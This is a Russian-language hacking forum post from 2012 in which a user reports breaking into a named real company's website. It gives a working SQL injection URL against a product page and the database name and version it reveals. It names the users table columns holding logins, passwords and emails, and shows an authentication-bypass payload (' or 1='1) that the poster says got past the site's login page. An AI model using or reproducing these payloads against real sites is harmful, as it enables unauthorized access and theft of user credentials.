14.07.2012, 22:54
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Магазинчик околовоенной тематики, а точнее вроде как снайперских прицелов =)
Site: www.trijicon.com
Inject:
Код:
_ttp://www.trijicon.com/na_en/products/product1.php?id=ACOG'/**/and/**/substring((@@version),1,1)='5
Info:
DB= iwt_trijicon
MySQL >5
UsersPath wt_trijicon->users->user_login|user_password|user_email
TYC = 40
PR = 4
На этом вроде бы всё, но на сайте есть куча параметров которые не фильтруются, и тогда я проверил свою догадку...
_ttps://www.trijicon.com/na_en/login.php
Email= ' or 1='1
Password = ' or 1='1
В яблочко =) (как раз в тему снайперских прицелов)
|
|
|